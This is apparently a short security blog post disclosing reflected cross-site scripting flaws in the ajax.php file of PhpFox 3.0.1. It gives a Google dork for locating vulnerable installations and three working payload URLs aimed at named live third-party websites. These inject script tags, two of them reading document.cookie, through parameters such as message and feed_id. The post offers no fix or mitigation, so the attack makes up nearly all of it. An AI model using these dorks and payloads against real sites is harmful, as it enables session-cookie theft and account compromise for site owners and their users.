PhpFox 3.0.1 Cross Site Scripting (XSS)

PhpFox 3.0.1 Cross Site Scripting. Lỗ hổng bảo mật XSS được phát hiện trong phiên bản 3.0.1 của PhpFox

PhpFox 3.0.1 Cross Site Scripting | Juno_okyo's Blog

Google Dork: Intext:"Powered By phpFox Version 3.0.1"

Vendor Home : http://www.phpfox.com/

There are lots of parametrs Vulnerable to xss in ajax.php file like feed_id & message & title &...

Demo

http://buddymahal.com//static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2874,%20117,%20110,%20111,%2095,%20111,%20107,%20121,%20111,%2039,%20115,%2032,%2066,%20108,%20111,%20103%29%29;%3C/script%3E&width=300

http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id="><script>alert(document.cookie);</script>&item_id=518&_=1346525603467

http://www.didarmasumane.tk//static/ajax.php?comment_type_id=feed&core[ajax]=true&core[call]=comment.viewMoreFeed&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=25&core[security_token]=1fa4d24158b81e721c5974d7f175b2ac&feed_id=id&item_id=518"><script>alert(document.cookie);</script>&_=1346525603467

Leader at J2TEAM. Website: https://j2team.dev/

Juno_okyo's Blog

PhpFox 3.0.1 Cross Site Scripting (XSS)

Demo

J2TEAM Cookies - Chia sẻ tài khoản mà không sợ lộ mật khẩu

Google Hacking DataBase (GHDB)

Hướng dẫn bảo vệ bạn chống lại các Hacker

2012 Dorks & Shell